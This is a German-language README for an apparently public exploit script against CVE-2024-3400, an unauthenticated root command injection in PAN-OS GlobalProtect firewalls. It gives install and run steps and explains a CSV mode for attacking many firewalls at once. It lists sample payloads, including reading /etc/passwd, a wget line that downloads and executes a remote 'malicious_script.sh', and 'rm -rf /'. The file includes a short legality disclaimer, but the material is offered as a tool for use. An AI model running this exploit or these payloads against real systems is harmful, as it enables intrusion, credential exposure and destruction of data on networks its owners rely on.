
# Exploit-Skript für CVE-2024-3400, eine Command Injection in PAN-OS GlobalProtect, die eine nicht authentifizierte Remote-Codeausführung mit Root-Rechten ermöglicht. Unterstützt die Ausnutzung einzelner sowie CSV-basierter Mehrfachziele.
Dieses Skript soll die Ausnutzung von Schwachstellen in PAN-OS-Firewalls demonstrieren. Es sendet einen speziell konstruierten Payload an den API-Endpunkt der Firewall, um beliebige Befehle auszuführen. Dieser Exploit richtet sich speziell gegen CVE-2024-3400, eine Befehlsinjektions-Schwachstelle in der GlobalProtect-Funktion der PAN-OS-Software von Palo Alto Networks für bestimmte PAN-OS-Versionen. Bestimmte Funktionskonfigurationen können es einem nicht authentifizierten Angreifer ermöglichen, beliebigen Code mit Root-Rechten auf der Firewall auszuführen.
Hinweis: Stellen Sie sicher, dass Sie dieses Skript nur für legale und ethische Zwecke verwenden, und nur auf Maschinen, für die Sie die Erlaubnis zum Testen haben.
Um dieses Projekt zu verwenden, führen Sie die folgenden Schritte aus:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Folgen Sie den Aufforderungen zur Eingabe der IP-Adresse der angreifbaren PAN-OS-Firewall und des auszuführenden Payloads.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
Das Skript fragt nach dem Dateipfad des SSL-Zertifikats vom PAN-OS-Firewall-Server. Wenn kein Pfad angegeben wird, setzt das Skript die SSL-Überprüfung automatisch auf false, wodurch SSL effektiv deaktiviert wird.
Dieses Skript ermöglicht es Ihnen, mehrere Ziele von angreifbaren PAN-OS-Firewalls mithilfe einer CSV-Datei auszunutzen. Nachfolgend finden Sie die Anweisungen zur korrekten Formatierung der CSV-Datei:
Die CSV-Datei sollte drei Spalten haben:
ipaddress: Die IP-Adresse der angreifbaren PAN-OS-Firewall. payload: Der auf der Firewall auszuführende Payload. path/to/root_CA_certificate.pem: Der Pfad zum Root-CA-Zertifikat (leer lassen, wenn die Zertifikatsüberprüfung deaktiviert ist).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Erstellen Sie eine CSV-Datei mit dem angegebenen Format. Füllen Sie die IP-Adressen, Payloads und Pfade zu den Root-CA-Zertifikaten (falls zutreffend) aus. Stellen Sie sicher, dass Sie gültige Pfade zu den Root-CA-Zertifikaten angeben, oder lassen Sie das Feld leer, wenn die Zertifikatsüberprüfung deaktiviert ist. Führen Sie das Skript aus und wählen Sie die Option zur Verwendung der CSV-Datei, wenn Sie dazu aufgefordert werden.